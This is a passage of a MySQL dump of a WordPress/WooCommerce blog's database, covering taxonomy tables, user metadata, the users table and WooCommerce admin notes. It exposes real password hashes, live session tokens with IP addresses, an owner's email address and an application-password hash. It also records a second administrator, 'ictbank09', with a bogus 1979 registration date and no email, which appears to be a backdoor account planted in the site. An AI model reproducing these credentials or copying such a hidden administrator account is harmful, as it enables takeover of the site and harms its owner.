(56,6,0),
(56,8,0),
(56,9,0),
(56,10,0),
(56,11,0),
(56,12,0),
(56,13,0),
(56,14,0),
(56,15,0),
(56,16,0),
(56,17,0),
(56,18,0),
(60,2,0),
(60,6,0),
(60,7,0),
(60,8,0),
(60,9,0),
(60,15,0),
(60,19,0),
(60,20,0),
(64,6,0),
(64,8,0),
(64,21,0),
(64,22,0),
(64,23,0),
(64,24,0),
(64,25,0),
(64,26,0),
(64,27,0),
(64,28,0),
(66,6,0),
(66,8,0),
(66,21,0),
(66,23,0),
(66,24,0),
(66,25,0),
(66,29,0),
(66,30,0),
(66,31,0),
(66,32,0),
(66,33,0),
(68,6,0),
(68,8,0),
(68,18,0),
(68,34,0),
(68,35,0),
(68,36,0),
(68,37,0),
(68,38,0),
(97,1,0),
(97,4,0),
(97,39,0),
(97,40,0),
(97,41,0),
(97,42,0),
(97,43,0),
(97,44,0),
(97,45,0),
(97,46,0),
(97,47,0),
(97,48,0),
(97,49,0),
(97,50,0),
(97,51,0),
(97,52,0),
(97,53,0),
(97,54,0),
(97,55,0),
(104,4,0),
(104,40,0),
(104,42,0),
(104,50,0),
(104,51,0),
(104,52,0),
(104,53,0),
(104,54,0),
(104,56,0),
(104,57,0),
(104,58,0),
(104,59,0),
(104,60,0),
(110,2,0),
(110,8,0),
(110,9,0),
(110,62,0),
(110,63,0),
(110,64,0),
(110,65,0),
(110,67,0),
(150,71,0),
(150,73,0),
(305,1,0),
(305,50,0),
(305,51,0),
(305,52,0),
(305,53,0),
(305,55,0),
(305,71,0),
(305,140,0),
(312,50,0),
(312,51,0),
(312,55,0),
(323,141,0),
(323,154,0),
(329,155,0),
(329,156,0),
(329,157,0),
(329,158,0),
(351,159,0),
(358,162,0),
(386,160,0),
(387,160,0),
(398,161,0),
(401,163,0),
(485,161,0),
(487,161,0),
(547,163,0),
(548,163,0),
(549,163,0),
(550,163,0),
(583,8,0),
(583,34,0),
(602,164,0),
(603,1,0),
(603,50,0),
(603,51,0),
(603,52,0),
(603,53,0),
(603,54,0),
(603,55,0),
(615,1,0),
(615,50,0),
(615,51,0),
(615,52,0),
(615,53,0),
(615,54,0),
(681,165,0),
(700,167,0),
(712,160,0),
(715,161,0),
(721,163,0),
(752,155,0),
(760,1,0),
(789,161,0),
(849,168,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_taxonomy`
--
DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_taxonomy` (
`term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`taxonomy` varchar(32) NOT NULL DEFAULT '',
`description` longtext NOT NULL,
`parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_taxonomy_id`),
UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=169 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_taxonomy`
--
LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES
(1,1,'category','',9,6),
(2,2,'post_tag','',0,3),
(3,3,'post_tag','',0,0),
(4,4,'post_tag','',0,2),
(5,5,'post_tag','',0,0),
(6,6,'post_tag','',0,5),
(7,7,'post_tag','',0,1),
(8,8,'category','',0,8),
(9,9,'category','',8,4),
(10,10,'category','',9,1),
(11,11,'post_tag','',0,1),
(12,12,'post_tag','',0,1),
(13,13,'post_tag','',0,1),
(14,14,'post_tag','',0,1),
(15,15,'post_tag','',0,2),
(16,16,'post_tag','',0,1),
(17,17,'post_tag','',0,1),
(18,18,'post_tag','',0,2),
(19,19,'category','',9,1),
(20,20,'post_tag','',0,1),
(21,21,'category','',8,2),
(22,22,'category','',21,1),
(23,23,'post_tag','',0,2),
(24,24,'post_tag','',0,2),
(25,25,'post_tag','',0,2),
(26,26,'post_tag','',0,1),
(27,27,'post_tag','',0,1),
(28,28,'post_tag','',0,1),
(29,29,'category','',21,1),
(30,30,'post_tag','',0,1),
(31,31,'post_tag','',0,1),
(32,32,'post_tag','',0,1),
(33,33,'post_tag','',0,1),
(34,34,'category','',8,2),
(35,35,'post_tag','',0,1),
(36,36,'post_tag','',0,1),
(37,37,'post_tag','',0,1),
(38,38,'post_tag','',0,1),
(39,39,'post_tag','',0,1),
(40,40,'post_tag','',0,2),
(41,41,'post_tag','',0,1),
(42,42,'post_tag','',0,2),
(43,43,'post_tag','',0,1),
(44,44,'post_tag','',0,1),
(45,45,'post_tag','',0,1),
(46,46,'post_tag','',0,1),
(47,47,'post_tag','',0,1),
(48,48,'post_tag','',0,1),
(49,49,'post_tag','',0,1),
(50,50,'category','',0,6),
(51,51,'category','',50,6),
(52,52,'category','',51,5),
(53,53,'category','',51,5),
(54,54,'category','',51,4),
(55,55,'category','',51,4),
(56,56,'post_tag','',0,1),
(57,57,'post_tag','',0,1),
(58,58,'post_tag','',0,1),
(59,59,'post_tag','',0,1),
(60,60,'post_tag','',0,1),
(61,61,'post_tag','',0,0),
(62,62,'post_tag','',0,1),
(63,63,'post_tag','',0,1),
(64,64,'post_tag','',0,1),
(65,65,'post_tag','',0,1),
(66,66,'post_tag','',0,0),
(67,67,'category','',9,1),
(71,71,'category','',0,2),
(73,73,'category','',71,1),
(140,140,'category','',71,1),
(141,141,'product_type','',0,1),
(142,142,'product_type','',0,0),
(143,143,'product_type','',0,0),
(144,144,'product_type','',0,0),
(145,145,'product_visibility','',0,0),
(146,146,'product_visibility','',0,0),
(147,147,'product_visibility','',0,0),
(148,148,'product_visibility','',0,0),
(149,149,'product_visibility','',0,0),
(150,150,'product_visibility','',0,0),
(151,151,'product_visibility','',0,0),
(152,152,'product_visibility','',0,0),
(153,153,'product_visibility','',0,0),
(154,154,'product_cat','',0,1),
(155,155,'category','',0,2),
(156,156,'category','',155,1),
(157,157,'post_tag','',0,1),
(158,158,'post_tag','',0,1),
(159,159,'wp_theme','',0,0),
(160,160,'elementor_library_type','',0,3),
(161,161,'elementor_library_type','',0,1),
(162,162,'elementor_library_type','',0,1),
(163,163,'nav_menu','',0,6),
(164,164,'wp_theme','',0,1),
(165,165,'elementor_library_type','',0,1),
(166,166,'elementor_library_type','',0,0),
(167,167,'elementor_library_type','',0,1),
(168,168,'wp_theme','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_termmeta`
--
DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_termmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `term_id` (`term_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_termmeta`
--
LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
INSERT INTO `wp_termmeta` VALUES
(1,154,'product_count_product_cat','1');
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_terms`
--
DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_terms` (
`term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(200) NOT NULL DEFAULT '',
`slug` varchar(200) NOT NULL DEFAULT '',
`term_group` bigint(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_id`),
KEY `slug` (`slug`(191)),
KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=169 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_terms`
--
LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES
(1,'Installation','installation',0),
(2,'Oracle','oracle',0),
(3,'grid','grid',0),
(4,'linux','linux',0),
(5,'preinstallation','preinstallation',0),
(6,'database','database',0),
(7,'asm','asm',0),
(8,'Database','database',0),
(9,'Oracle','oracle',0),
(10,'Export/Import (EXPDP/IMPDP)','expdp-impdp',0),
(11,'impdp','impdp',0),
(12,'expdp','expdp',0),
(13,'export','export',0),
(14,'import','import',0),
(15,'error','error',0),
(16,'ora-02374','ora-02374',0),
(17,'ora-12899','ora-12899',0),
(18,'characterset','characterset',0),
(19,'ASM','asm',0),
(20,'fatal','fatal',0),
(21,'Microsoft SQL Server','mssql',0),
(22,'Backup Restore','backup-restore',0),
(23,'sql','sql',0),
(24,'mssql','mssql',0),
(25,'sqlserver','sqlserver',0),
(26,'backup','backup',0),
(27,'restore','restore',0),
(28,'progress','progress',0),
(29,'Indexes','indexes',0),
(30,'index','index',0),
(31,'rebuild','rebuild',0),
(32,'reorganize','reorganize',0),
(33,'script','script',0),
(34,'MySQL','mysql',0),
(35,'mysql','mysql',0),
(36,'mariadb','mariadb',0),
(37,'collation','collation',0),
(38,'alter','alter',0),
(39,'ictbank','ictbank',0),
(40,'centos','centos',0),
(41,'fedora','fedora',0),
(42,'oraclelinux','oraclelinux',0),
(43,'redhat','redhat',0),
(44,'disk','disk',0),
(45,'fdisk','fdisk',0),
(46,'scsi','scsi',0),
(47,'reboot','reboot',0),
(48,'adddisk','adddisk',0),
(49,'os','os',0),
(50,'OS','os',0),
(51,'Linux','linxu',0),
(52,'RedHat','redhat',0),
(53,'CentOS','centos',0),
(54,'Oracle Linux','oraclelinux',0),
(55,'Fedora','fedora',0),
(56,'redat','redat',0),
(57,'network','network',0),
(58,'loadbalancer','loadbalancer',0),
(59,'rpm','rpm',0),
(60,'config','config',0),
(61,'#oracle','oracle-2',0),
(62,'encryption','encryption',0),
(63,'server','server',0),
(64,'client','client',0),
(65,'sqlnet.ora.','sqlnet-ora',0),
(66,'sqlnet.ora','sqlnet-ora-2',0),
(67,'DB Security','db-security',0),
(71,'Security','security',0),
(73,'Wordpress','wordpress-web-security',0),
(140,'Apache','apache',0),
(141,'simple','simple',0),
(142,'grouped','grouped',0),
(143,'variable','variable',0),
(144,'external','external',0),
(145,'exclude-from-search','exclude-from-search',0),
(146,'exclude-from-catalog','exclude-from-catalog',0),
(147,'featured','featured',0),
(148,'outofstock','outofstock',0),
(149,'rated-1','rated-1',0),
(150,'rated-2','rated-2',0),
(151,'rated-3','rated-3',0),
(152,'rated-4','rated-4',0),
(153,'rated-5','rated-5',0),
(154,'Uncategorized','uncategorized',0),
(155,'Other','other',0),
(156,'Podcast','podcast',0),
(157,'Podcast','podcast',0),
(158,'Hosting','hosting',0),
(159,'twentytwenty','twentytwenty',0),
(160,'page','page',0),
(161,'header','header',0),
(162,'footer','footer',0),
(163,'Main Menu','main-menu',0),
(164,'phlox','phlox',0),
(165,'single-post','single-post',0),
(166,'archive','archive',0),
(167,'landing-page','landing-page',0),
(168,'hello-elementor','hello-elementor',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_usermeta`
--
DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_usermeta` (
`umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`umeta_id`),
KEY `user_id` (`user_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=216 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_usermeta`
--
LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES
(1,1,'nickname','admin'),
(2,1,'first_name',''),
(3,1,'last_name',''),
(4,1,'description',''),
(5,1,'rich_editing','true'),
(6,1,'syntax_highlighting','true'),
(7,1,'comment_shortcuts','false'),
(8,1,'admin_color','fresh'),
(9,1,'use_ssl','0'),
(10,1,'show_admin_bar_front','true'),
(11,1,'locale',''),
(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),
(13,1,'wp_user_level','10'),
(14,1,'dismissed_wp_pointers',''),
(15,1,'show_welcome_panel','1'),
(17,1,'wp_dashboard_quick_press_last_post_id','837'),
(18,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"178.252.180.0\";}'),
(19,1,'_new_email','a:2:{s:4:\"hash\";s:32:\"d8e8d0a396fedf328fa42d6739c252aa\";s:8:\"newemail\";s:25:\"masoud.nikoofar@gmail.com\";}'),
(73,1,'_yoast_wpseo_profile_updated','1720846307'),
(95,1,'last_update','1758637161'),
(179,1,'session_tokens','a:2:{s:64:\"6bd8a7804d74efdb42c7a8ecef8e875fcc53f6420a67a0abefccb6159af7b11b\";a:4:{s:10:\"expiration\";i:1758771756;s:2:\"ip\";s:15:\"178.252.180.169\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36\";s:5:\"login\";i:1758598956;}s:64:\"6e7b3f697a4c4d25f3cce3de6f734ba53298a94d9324dc3e75343024bd79aa30\";a:4:{s:10:\"expiration\";i:1758804840;s:2:\"ip\";s:15:\"178.252.180.169\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36\";s:5:\"login\";i:1758632040;}}'),
(180,1,'elementor_admin_notices','a:2:{s:20:\"design_not_appearing\";a:2:{s:9:\"is_viewed\";b:1;s:4:\"meta\";a:1:{s:7:\"version\";s:6:\"3.23.4\";}}s:31:\"elementor-pro-forms-submissions\";a:2:{s:9:\"is_viewed\";b:1;s:4:\"meta\";a:0:{}}}'),
(181,1,'wpseo_metadesc',''),
(182,1,'wpseo_title',''),
(183,1,'wpseo_content_analysis_disable',''),
(184,1,'wpseo_inclusive_language_analysis_disable',''),
(185,1,'wpseo_keyword_analysis_disable',''),
(186,1,'_yoast_wpseo_introductions','a:3:{s:42:\"ai-generate-titles-and-descriptions-upsell\";b:1;s:25:\"ai-fix-assessments-upsell\";b:1;s:24:\"google-docs-addon-upsell\";b:1;}'),
(187,1,'elementor_introduction','a:4:{s:6:\"e-apps\";b:1;s:27:\"ai-get-started-announcement\";b:1;s:28:\"yoast-introduction-editor-v2\";b:1;s:20:\"globals_introduction\";b:1;}'),
(195,1,'wfls-last-login','1723447766'),
(197,6,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),
(198,6,'wp_user_level','10'),
(199,6,'session_tokens','a:1:{s:64:\"e4629106500c23c2ddd12de78f9f0976d0b4e2447ec4c4e7138fea39b98015f6\";a:4:{s:10:\"expiration\";i:1737823268;s:2:\"ip\";s:13:\"167.86.125.80\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36\";s:5:\"login\";i:1737650468;}}'),
(200,6,'wp_dashboard_quick_press_last_post_id','819'),
(201,6,'_application_passwords','a:1:{i:0;a:7:{s:4:\"uuid\";s:36:\"f29626dc-ac0f-49f6-a5c4-4de764bb7662\";s:6:\"app_id\";s:0:\"\";s:4:\"name\";s:8:\"3671bc2d\";s:8:\"password\";s:34:\"$P$BcoFtT5Los2iNggePVyCfC5JUS3I2O.\";s:7:\"created\";i:1737650476;s:9:\"last_used\";N;s:7:\"last_ip\";N;}}'),
(202,6,'_yoast_wpseo_profile_updated','1743378247'),
(204,1,'wp_yoast_notifications','a:1:{i:0;a:2:{s:7:\"message\";s:197:\"You've added a new type of content. We recommend that you review the corresponding <a href=\"https://ictbank.ir/blog/wp-admin/admin.php?page=wpseo_page_settings\">Search appearance settings</a>.\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:25:\"content-types-made-public\";s:7:\"user_id\";i:1;s:5:\"nonce\";N;s:8:\"priority\";d:0.8;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}'),
(205,1,'wp_user-settings','libraryContent=browse&editor=tinymce'),
(206,1,'wp_user-settings-time','1758632037'),
(207,1,'wpseo_seen_llm_txt_opt_in_notification','1'),
(208,1,'manageedit-postcolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),
(209,1,'manageedit-postcolumnshidden_default','1'),
(210,1,'manageedit-pagecolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),
(211,1,'manageedit-pagecolumnshidden_default','1'),
(212,1,'manageedit-e-floating-buttonscolumnshidden','a:3:{i:0;s:0:\"\";i:1;s:15:\"rank_math_title\";i:2;s:21:\"rank_math_description\";}'),
(213,1,'manageedit-e-floating-buttonscolumnshidden_default','1'),
(214,1,'meta-box-order_page','a:2:{i:0;b:0;s:4:\"side\";s:38:\"submitdiv,rank_math_metabox_content_ai\";}'),
(215,2,'last_update','1758637161');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_users`
--
DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_users` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_login` varchar(60) NOT NULL DEFAULT '',
`user_pass` varchar(255) NOT NULL DEFAULT '',
`user_nicename` varchar(50) NOT NULL DEFAULT '',
`user_email` varchar(100) NOT NULL DEFAULT '',
`user_url` varchar(100) NOT NULL DEFAULT '',
`user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`user_activation_key` varchar(255) NOT NULL DEFAULT '',
`user_status` int(11) NOT NULL DEFAULT 0,
`display_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`ID`),
KEY `user_login_key` (`user_login`),
KEY `user_nicename` (`user_nicename`),
KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_users`
--
LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES
(1,'masoud','$wp$2y$10$/gNaJMC17An20fFJPuH.eeA6.K04NzjWpQT6CC0DJTtyECIhmRPU.','masoud','masoud.nikoofar@gmail.com','https://ictbank.ir/blog','2011-06-07 00:00:00','',0,'masoud'),
(6,'ictbank09','$P$BPRxYP2/2gOfF7bJGCDc3ZB/Mg0yZh0','ictbank09','','','1979-01-01 00:00:00','',0,'ictbank09');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wc_admin_note_actions`
--
DROP TABLE IF EXISTS `wp_wc_admin_note_actions`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_admin_note_actions` (
`action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`note_id` bigint(20) unsigned NOT NULL,
`name` varchar(255) NOT NULL,
`label` varchar(255) NOT NULL,
`query` longtext NOT NULL,
`status` varchar(255) NOT NULL,
`is_primary` tinyint(1) NOT NULL DEFAULT 0,
`actioned_text` varchar(255) NOT NULL,
`nonce_action` varchar(255) DEFAULT NULL,
`nonce_name` varchar(255) DEFAULT NULL,
PRIMARY KEY (`action_id`),
KEY `note_id` (`note_id`)
) ENGINE=InnoDB AUTO_INCREMENT=13294 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wc_admin_note_actions`
--
LOCK TABLES `wp_wc_admin_note_actions` WRITE;
/*!40000 ALTER TABLE `wp_wc_admin_note_actions` DISABLE KEYS */;
INSERT INTO `wp_wc_admin_note_actions` VALUES
(1,1,'yes-please','Yes please!','https://woocommerce.us8.list-manage.com/subscribe/post?u=2c1434dc56f9506bf3c3ecd21&id=13860df971&SIGNUPPAGE=plugin','actioned',0,'',NULL,NULL),
(3,3,'connect','Connect','?page=wc-addons§ion=helper','unactioned',0,'',NULL,NULL),
(54,12,'learn-more','Learn more','https://docs.woocommerce.com/document/managing-orders/?utm_source=inbox','actioned',0,'',NULL,NULL),
(62,13,'learn-more','Learn more','https://woocommerce.com/mobile/','actioned',0,'',NULL,NULL),
(100,16,'tracking-opt-in','Activate usage tracking','','actioned',1,'',NULL,NULL),
(108,17,'share-feedback','Share feedback','https://automattic.survey.fm/new-onboarding-survey','actioned',0,'',NULL,NULL),
(109,18,'affirm-insight-first-sale','Yes','','actioned',0,'Thanks for your feedback',NULL,NULL),
(110,18,'deny-insight-first-sale','No','','actioned',0,'Thanks for your feedback',NULL,NULL),
(154,20,'customize-store-with-blocks','Learn more','https://woocommerce.com/posts/how-to-customize-your-online-store-with-woocommerce-blocks/?utm_source=inbox','actioned',1,'',NULL,NULL),
(597,8,'install-now','Install now','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,'',NULL,NULL),
(599,10,'install-now','Install now','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,'',NULL,NULL),
(929,32,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox','actioned',0,'',NULL,NULL),
(1614,37,'visit-the-theme-marketplace','Visit the theme marketplace','https://woocommerce.com/product-category/themes/?utm_source=inbox','actioned',0,'',NULL,NULL),
(1615,38,'affirm-insight-first-product-and-payment','Yes','','actioned',0,'Thanks for your feedback',NULL,NULL),
(3882,50,'wayflyer_q3_2021','Get funded','https://woocommerce.com/products/wayflyer/','actioned',1,'',NULL,NULL),
(3883,49,'eu_vat_changes_2021','Learn more about the EU tax regulations','https://woocommerce.com/posts/new-eu-vat-regulations','actioned',1,'',NULL,NULL),
(3884,34,'open_wc_paypal_payments_product_page','Learn more','https://woocommerce.com/products/woocommerce-paypal-payments/','actioned',1,'',NULL,NULL),
(3885,25,'upgrade_now_facebook_pixel_api','Upgrade now','plugin-install.php?tab=plugin-information&plugin=§ion=changelog','actioned',1,'',NULL,NULL),
(3886,26,'learn_more_facebook_ec','Learn more','https://woocommerce.com/products/facebook/','unactioned',1,'',NULL,NULL),
(3892,23,'boost-sales-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-boost-sales','actioned',1,'',NULL,NULL),
(3893,24,'grow-your-business-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-grow-your-business','actioned',1,'',NULL,NULL),
(3894,33,'add-apple-pay','Add Apple Pay','/admin.php?page=wc-settings&tab=checkout§ion=woocommerce_payments','actioned',1,'',NULL,NULL),
(3895,33,'learn-more','Learn more','https://docs.woocommerce.com/document/payments/apple-pay/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay','actioned',1,'',NULL,NULL),
(3896,30,'boost-sales-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-boost-sales','actioned',1,'',NULL,NULL),
(3897,31,'grow-your-business-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-grow-your-business','actioned',1,'',NULL,NULL),
(3902,40,'learn-more','Learn about Instant Deposits eligibility','https://docs.woocommerce.com/document/payments/instant-deposits/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_instant_deposits','actioned',1,'',NULL,NULL),
(3906,44,'get-woo-commerce-payments','Get WooCommerce Payments','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,'',NULL,NULL),
(3907,45,'get-woocommerce-payments','Get WooCommerce Payments','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,'',NULL,NULL),
(4220,69,'notify-refund-returns-page','Edit page','http://ictbank.ir/blog/wp-admin/post.php?post=606&action=edit','actioned',0,'',NULL,NULL),
(4228,70,'learn-more','Learn more','https://woocommerce.com/posts/pre-launch-checklist-the-essentials/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),
(4229,71,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),
(4230,72,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox&utm_medium=product','actioned',0,'',NULL,NULL),
(4231,73,'update-store-details','Update store details','http://ictbank.ir/blog/wp-admin/admin.php?page=wc-admin&path=/setup-wizard','actioned',0,'',NULL,NULL),
(4268,74,'view-report','View report','?page=wc-admin&path=/analytics/revenue&period=custom&compare=previous_year&after=2022-02-19&before=2022-02-19','actioned',0,'',NULL,NULL),
(4444,64,'wc_simple_payments_m2_reader_launch_q1_2022','Learn more','https://woocommerce.com/in-person-payments/','actioned',0,'',NULL,NULL),
(4554,55,'stripe_applepay_holiday2021','Accept Apple Pay','https://woocommerce.com/apple-pay/','actioned',1,'',NULL,NULL),
(4555,56,'square_applepay_holiday2021','Accept Apple Pay','https://woocommerce.com/apple-pay/','actioned',1,'',NULL,NULL),
(4556,57,'wcpay_applepay_holiday2021','Accept Apple Pay','https://woocommerce.com/apple-pay/','actioned',1,'',NULL,NULL),
(5666,65,'wcpay_applepay_q1_2022','Let your customers know about Apple Pay','https://developer.apple.com/apple-pay/marketing/','actioned',0,'',NULL,NULL),
(5667,66,'stripe_applepay_q1_2022','Add Apple Pay','http://ictbank.ir/blog/wp-admin/admin.php?page=wc-admin&page=wc-settings&tab=checkout§ion=stripe','actioned',0,'',NULL,NULL),
(5668,67,'square_applepay_q1_2022','Add Apple Pay','http://ictbank.ir/blog/wp-admin/admin.php?page=wc-admin&page=wc-settings&tab=square','actioned',0,'',NULL,NULL),
(6159,78,'enable-navigation','Enable in Settings','http://ictbank.ir/blog/wp-admin/admin.php?page=wc-settings&tab=advanced§ion=features','actioned',0,'',NULL,NULL),
(6748,68,'lead_gen_existing_customers_1','Yes, please','https://woocommerce.com/take-your-business-to-the-next-level/?utm_source=inbox_note&utm_medium=product&utm_campaign=lead_gen_existing_customers_1','actioned',0,'',NULL,NULL),
(7013,79,'pinterest_gtm_q2_2021','Get started for free','https://woocommerce.com/products/pinterest-for-woocommerce/?utm_source=inbox_note&utm_medium=product&utm_campaign=pinterest_gtm_q2_2021','unactioned',1,'',NULL,NULL),
(7123,81,'woocommerce_payments_subscriptions_nopayments_q2_2022','Start selling subscriptions','https://woocommerce.com/products/woocommerce-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=woocommerce_payments_subscriptions_nopayments_q2_2022','actioned',0,'',NULL,NULL),
(7124,82,'woocommerce_payments_subscriptions_yespayments_q2_2022','Get started','https://woocommerce.com/document/payments/subscriptions/?utm_source=inbox_note&utm_medium=product&utm_campaign=woocommerce_payments_subscriptions_yespayments_q2_2022#section-2','actioned',0,'',NULL,NULL),
(7543,87,'googlelistings_multicountrygtm_q22022','Get Google Listings & Ads – free','https://woocommerce.com/products/google-listings-and-ads/?utm_source=inbox_note&utm_medium=product&utm_campaign=googlelistings_multicountrygtm_q22022','actioned',1,'',NULL,NULL),
(7770,83,'setup_task_second_survey_q2_2022_share_your_input','Share your input','https://t.maze.co/87390007','actioned',0,'',NULL,NULL),
(7808,86,'affirm_q2_2022','Get started for free','https://woocommerce.com/products/woocommerce-gateway-affirm/?utm_source=inbox_note&utm_medium=product&utm_campaign=affirm_q2_2022','unactioned',1,'',NULL,NULL),
(8181,88,'wc_ipp_order_creation_GTM_launch_q2_2022','Grow my business on the go','https://woocommerce.com/in-person-payments/?utm_source=inbox_note&utm_medium=product&utm_campaign=wc_ipp_order_creation_GTM_launch_q2_2022','actioned',0,'',NULL,NULL),
(9070,85,'wc-admin-EU-consumer-protection','Learn more about these changes','https://ec.europa.eu/info/law/law-topic/consumer-protection-law/review-eu-consumer-law_en#guidance','actioned',1,'',NULL,NULL),
